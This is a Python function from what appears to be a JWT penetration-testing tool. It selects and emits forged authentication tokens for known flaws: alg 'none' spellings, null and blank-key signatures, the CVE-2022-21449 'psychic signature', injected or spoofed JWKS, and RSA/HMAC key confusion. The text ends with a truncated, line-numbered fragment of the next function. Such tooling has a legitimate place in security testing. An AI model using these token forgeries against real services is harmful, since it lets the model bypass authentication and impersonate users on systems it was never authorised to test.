def runExploits():
    """Emit one forged token for the exploit selected with ``--exploit``.

    ``args.exploit`` is a single-letter code; each code maps to a local helper
    that builds a token exercising one known validation weakness (the ``alg``
    "none" spellings, a null or blank-key signature, the CVE-2022-21449
    signature, an embedded or spoofed JWKS, or HMAC signing with the RSA public
    key) and hands it to ``jwtOut`` with a title and description.  As every
    description states, such tokens are only accepted by implementations that
    lack the corresponding check.

    Reads the parsed token (``headDict``, ``paylDict``, ``paylB64``,
    ``contents``) plus ``args``, ``config`` and ``parser`` from module scope.
    Returns nothing; an unset or unrecognised code is a no-op.
    """
    if not args.exploit:
        return

    # Every exploit description ends with this caveat; concatenated so the
    # emitted text stays identical to the original wording.
    unpatched = "\n(This will only be valid on unpatched implementations of JWT.)"

    def alg_none():
        # Tokens returned by checkAlgNone are paired, by position, with the
        # "alg" spelling each one is expected to carry.  Going through a dict
        # keeps first-seen order and collapses any duplicate token strings.
        spellings = ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""]
        paired = dict(zip(checkAlgNone(headDict, paylB64), spellings))
        for token, label in paired.items():
            desc = ("EXPLOIT: " + label
                    + " - this is an exploit targeting the debug feature that allows a token to have no signature"
                    + unpatched)
            jwtOut(token, "Exploit: " + label, desc)

    def null_signature():
        jwtOut(checkNullSig(contents),
               "Exploit: Null signature",
               "EXPLOIT: null signature" + unpatched)

    def psychic_signature():
        jwtOut(checkPsySig(headDict, paylB64),
               "Exploit: Psychic Signature (CVE-2022-21449)",
               "EXPLOIT: Psychic Signature (CVE-2022-21449)" + unpatched)

    def blank_password():
        # Sign with an empty key (256 presumably selects HS256 -- see signTokenHS).
        sig, body = signTokenHS(headDict, paylDict, "", 256)
        jwtOut(body + "." + sig,
               "Exploit: Blank password accepted in signature",
               "EXPLOIT: Blank password accepted in signature" + unpatched)

    def injected_jwks():
        sig, body = jwksEmbed(headDict, paylDict)
        jwtOut(body + "." + sig, "Injected JWKS", "EXPLOIT: injected JWKS" + unpatched)

    def spoof_jwks():
        # Prefer the configured static JWKS location; fall back to the dynamic one.
        jku = config['services']['jwksloc'] or config['services']['jwksdynamic']
        body, sig = exportJWKS(jku)
        # Only when the static location is the one passed on the command line
        # does the operator need to place the JWKS file there first.
        if config['services']['jwksloc'] and config['services']['jwksloc'] == args.jwksurl:
            jwks_file = config['crypto']['jwks']
            cprintc("Paste this JWKS into a file at the following location before submitting token request: "
                    + jku + "\n(JWKS file used: " + jwks_file + ")\n" + str(jwks_file), "cyan")
        jwtOut(body + "." + sig, "Spoof JWKS", "Signed with JWKS at " + jku)

    def key_confusion():
        pubkey = config['crypto']['pubkey']
        if not pubkey:
            # No -pk given: report it and show usage, but do not abort the run.
            cprintc("No Public Key provided (-pk)\n", "red")
            parser.print_usage()
            return
        tok, sig = checkPubKeyExploit(headDict, paylB64, pubkey)
        jwtOut(tok + "." + sig,
               "RSA Key Confusion Exploit",
               "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)" + unpatched)

    # Exploit code -> handler; codes outside this table are ignored, as before.
    handlers = {
        "a": alg_none,
        "n": null_signature,
        "p": psychic_signature,
        "b": blank_password,
        "i": injected_jwks,
        "s": spoof_jwks,
        "k": key_confusion,
    }
    handler = handlers.get(args.exploit)
    if handler is not None:
        handler()
1785def runActions():
1786 if args.tamper:
